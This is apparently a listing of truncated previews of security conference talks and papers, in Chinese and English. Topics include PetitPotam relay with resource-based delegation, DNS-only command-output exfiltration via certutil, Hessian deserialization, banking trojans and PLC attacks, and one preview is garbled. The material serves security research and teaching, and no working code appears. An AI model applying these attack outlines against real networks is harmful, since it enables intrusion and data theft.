PetitPotam配合基于资源委派的横向技巧 原理:使用PetitPotam将目标主机的身份认证中继到dc的ldap服务配置资源委派,然后使用资源 委派获取目标主机权限。 当微软修复CVE-2019-1040的时候,顺便修了smb中继到ldap。 但是我们还能通过http中继到ldap,但前提条件是目标打开Webclient服务,server默认不安装, win7,win10默认安装但是需要手动打开服务。 条件: 域账户一个 目标主机需要打开Webclient服务 细节: PetitPotam可以发起http请求,然后将http中继到ldap http中继需要使用可信域名,域内dns即为可信域名 环境: DC:192.168.60...
pdf
从S-SDLC视角看API安全 【API威胁检测防御】专题研讨会 Silver Zhang 为何将API安全拧出来说 为何将API安全拧出来说 感冒 VS. 禽流感 感冒 VS. 禽流感 应用安全 VS. 移动安全 应用安全 VS. 移动安全 新业态 新业态 API历史沿革及风险评估 API面临的安全挑战 传输 存储 认证 授权 输入 输出 ➢ 客 户 端 不 支 持 加 密 传 输 协 议 怎 么 办 ➢ 客 户 需 要 走 非 加 密 支 持 代 理 ➢ 客 户 端 未 做 服 务 端 证 书 合 法 有 效 性 校 验 怎 么 办 ➢ 服 务 端 加 密 数 据 如 何 让 客 户 端 解 密 ➢ 客 户 的 服 务 端 与 ...
pdf
Web server botnets and hosting farms as attack platforms Gadi Evron – Beyond Security defcon 15 , 2007 About me Who I am.. What do I do.. Where do I work.. Regular malware Often… Platform specific (Architecture, OS) Propagates by the use of: Vulnerabilities (web server, mail client, remote accessible service) ...
pdf
CTF 微⼼心得 ddaa Who am I • dada = ddaa = 0xddaa = 達達 != ⼤大⼤大 • Start to play CTF since last year • One of the members in HITCON CTF team. 3 故事的開始是這樣的 ⼤大四跨校選課,選修程式安全 http://wargame.cs.nctu.edu.tw Copyright ©2012 SQlab 4 幹,好難 (助教可以給更多 hint 嗎 T_T) 5 6 結果研究所不⼩小⼼心進了 SQLab…… 學⻑⾧長:”你們也有報名 HITCON ? ...
pdf
Harm Reduction A Framework For Effective & Compassionate Security Guidance Kyle Tobener Blackhat 2022 Tiktok: @kyle.tobener Twitter: @kylekyle Story time DARE, Every 15, and similar programs likely increase alcohol intake. Why am I telling you this? Imagine that was your security program I want to help you give be...
pdf
Module 2 Typical goals of malware and their implementations https://github.com/hasherezade/malware_training_vol1 Dissecting a Banking Trojan Banking Trojans - families • Zbots – (a family of various forks of the ZeuS code) • IcedID • Tinba • Gozi (and Gozi-based) • Kronos • TrickBot (some of the modules) • ...and othe...
pdf
QARK Who are we? APK structure Reversing APKs Components Communications What’s (still) wrong with Android? What is QARK? What QARK is not (yet) QARK motivation QARK’s mission Under the hood What does QARK do? Tying it all together What else? Then what? What else? The fun part Demo time! Future plans Where to get QARK?...
pdf
1 The state of web application security 2012 Robert Rowley Security Architect DreamHost Robert.Rowley@DreamHost.com 1 Break Down Attack Trends Attacker Motivation Auditing Backdoors 2 Trends 3 Collecting data Web Application Firewall (mod_security) Running on 1,000,000+ websites Centralized loggin...
pdf
John Shaw, Wisconsin DOT, 2013 Federal Highway Administration, 2013 Non-Significant Address Part (NAP) Upper Address Part (UAP) Lower Address Part (LAP) 00:00 09 4E:22:19 Manufacturer-assigned, irrelevant Can be derived from traffic Sent in every packet University of Washington STAR Lab Washington State Transportation ...
pdf
BYO-Disaster Why Corporate Wireless Still Sucks! We’re just nerds with random ideas and inconsistent results! djwishbone PuNk1nPo0p Why you should stay! What   Obtain Clear-Text credentials from any PEAP enabled WPA2-Enterprise Network without cracking a single HASH.   Get access to a new set of tools t...
pdf
S-hessian反序列化 介绍 自己不会查吗? 这里有一个点就是Hessian的序列化与反序列化与原生序列化与反序列化不同,就以使用的Resin链而言,其中的ja vax.naming.spi.ContinuationDirContext类并没有实现java.io.Serializable接口,但是hessian还是可以 正常对他进行序列化,用原生的序列化方式就会失败。区别就在于序列化对象时的一个设置,可以让未继承java.i o.Serializable接口的类进行序列化。 使用 hessian的使用有很多场景,也结合了 servlet和 spring,这里的使用先使用自行封装,然后调试分析漏洞成因, 最后再看整合后的集中情况。...
pdf
The Commercial Malware Industry Peter Gutmann University of Auckland Some History: The Numbers Racket The numbers racket = Lotto before the government took it over • Run through barber shops, groceries by local operators • Bets were for cents • Players chose a 3-digit number • “Drawn” using the last 3 digits of the to...
pdf
Shell is Only the Beginning——后渗透阶段的攻防对抗 3gstudent & Evi1cg As a offensive researcher, if you can dream it,someone has likely already done it and that someone isn’t the kind of person who speaks at security cons… ——Matt Graeber 3gstudent Good$Study Good$Health Good$Attitude$ Evi1cg Thin WhiteHat Security$Researcher ...
pdf
The spear to break the security wall of S7CommPlus CHENG LEI , NSFOCUS Related Work • Dillon Beresford. Exploiting Siemens Simatic S7 PLCs. Black Hat 2011 USA. S7Comm protocol • Ralf Spenneberg et. al. PLC-Blaster: A Worm Living Solely in the PLC. Black Hat 2016 USA Early S7CommPlus protoco...
pdf
Defcon 25 The Internet Already Knows I’m Pregnant Kashmir Hill - kashmir.hill@gizmodomedia.com - @kashhill Cooper Quintin - cooperq@eff.org - @cooperq Defcon 25 Intro Kashmir • Journalist • Privacy Expert • New Mother Cooper • Hacker • Privacy Activist • Cares about privacy issues for people with wombs Defcon 25 Sk...
pdf
- 0. 1 1 2 3 ( • lSIXe14BC 065 • 44Al Xe • X1 • U • NA5 • lrQ0 b • 0iT • ku t • g vDm • H NP • lo dM • ax13 v • 2n404 • G 4 • rZbla EAFm • ew • U8BAF • B88FPir • h1F 3E8FPi n • R88t R • rEF TNc • E3 • T f • osd51.BEE E3 • h2E9DEEw • RZ7FEBEED OW • 1RkNC803 • 3EB8F6Dg0FED S 5 (3102r Ø9VS Ør3ai l(3102 032a99n l9l...
pdf
Tor: The Second-Generation Onion Router Roger Dingledine The Free Haven Project arma@freehaven.net Nick Mathewson The Free Haven Project nickm@freehaven.net Paul Syverson Naval Research Lab syverson@itd.nrl.navy.mil Abstract We present Tor, a circuit-based low-latency anonymous com- munication service. This second-gene...
pdf
物聯網 BLE 認證機制設計的挑戰 以 Gogoro Smart Scooter 為例 GD、CSC 台灣科技大學 資管所 隱私與風險管理實驗室 講師介紹 G D • 台灣科技大學 資管所 碩士生 • Team T5 CTO (Chief Food Officer) • CHROOT Member • 曾任 • 到處打零工 • 好學生乖小孩 • 數位鑑識、事件處理、威脅情資整合 • 走在路上偶爾踢到一些漏洞 去年 Synology 送我一台 NAS 希望 Gogoro 也能這麼 nice XD CSC • 台灣科技大學 資管所 副教授 • 夠麻吉股份有限公司 獨立董事 • 台灣大學 資訊管理 博士 • 曾任 • 資誠企業管理顧問股份...
pdf
KinectASploit What if you took a kinect KinectASploit Used it's skeleton tracking feature: KinectASploit Sprinkled in some hacking tools: KinectASploit And combined them with a 3D Game Engine: Lets find out! Come see the Demo at Defcon19 and look for the tool source at: http://p0wnlabs.com/defcon19 Any graphics ...
pdf
HUNT @jhaddix @swagnetow @FatihEgbatan @digitalwoot @_Sha128 @bugcrowd Data Driven Web Hacking & Manual Testing Contribs Motley crew at @bugcrowd ➔ SecOps & Security Engineering groups ➔ Bughunters, Pentesters, Code Analysis, ++ ➔ Burp Suite fans The Problem(z) 1. Increasingly large and complicated Web Applications. ...
pdf
Hacker'Machine,Interface, State,of,the,Union,for,SCADA,HMI,Vulnerabili:es, Copyright,2016,Trend,Micro,Inc., 2, Introduc:on, Copyright,2016,Trend,Micro,Inc., 3, Trend,Micro,Zero,Day,Ini:a:ve, •  Fritz,Sands,',@FritzSands, –  Security)Researcher)–)Zero)Day)Ini4a4ve) –  Root)cause)analysis)and)vulnerability)discovery) –  ...
pdf
>> 0 >> 1 >> 2 >> 3 >> 4 >> Making of The DEFCON Documentary Jason Scott & Rachel Lovinger DEF CON 21, August 2, 2013 >> 0 >> 1 >> 2 >> 3 >> 4 >> e f g h I. HOW IT BEGAN >> 0 >> 1 >> 2 >> 3 >> 4 >> >> 0 >> 1 >> 2 ...
pdf
Fuzz 大法之挖掘潜在的逻辑越权 Author:Vulkey_Chen Blog:gh0st.cn 小密圈:Web 安全 SzS 对一个网站做测试的时候发现了这样一条请求: 这条请求返回的信息是个人信息(用户 ID、手机号、密码) {"responseData":{"userid":"用户 id","login":"用户名","password":"密码","mobilenum":"手机号 ","mobileisbound":"01","email":null}} 一开始的想法是变为 GET 请求(可行),然后增加 JSONP 劫持的回调参数。。。(失败) 之前也有人问我怎么去做参数字典的收集: A. 注意网站参...
pdf
Windows下DNS出⽹的命令回显技巧.md 2022/6/30 1 / 9 Windows下DNS出⽹的命令回显技巧 最近遇⻅了很多仅DNS出⽹的极限环境,简单研究了个还算通⽤的利⽤DNSLog的回显Trick,全当抛砖引 ⽟,不喜勿喷。 0x00 前⾔ 在实战中,命令执⾏总能遇⻅各种各样的环境,⽆回显且仅DNS出⽹的环境也能占个⼤多数。仅DNS出⽹的 环境⼀般利⽤编码+DNSLog就可以解决回显问题。 通⽤指的是在server2003(⽆powershell)环境也能⽤。 windows⾃带的encode只有certutil Windows下DNS出⽹的命令回显技巧.md 2022/6/30 2 / 9 certutil⾃带了...
pdf
Security Research over Windows [ kernel ] Draft v.1.1 $whoami • @zer0mem ~ Peter Hlavaty • Senior Security Researcher at KeenLab, Tencent • MSRC100, pwn2own • Focus : kernel / hyperv / mitigations • sometimes talk somewhere .. • wushu player +- ☺ Sandbox • Restrict resources of target ( process ) • #syscalls • file sy...
pdf
Hacking Wireless Networks of the Future: Security in Cognitive Radio Networks Hunter Scott / August 3, 2013 Radio + Software Defined Radio Cognitive Radio + Cognitive Radio Network Cognitive Engine Center Frequency Bandwidth Transmit power Type of modulation Coding rate Channel access protocol Encryptio...
pdf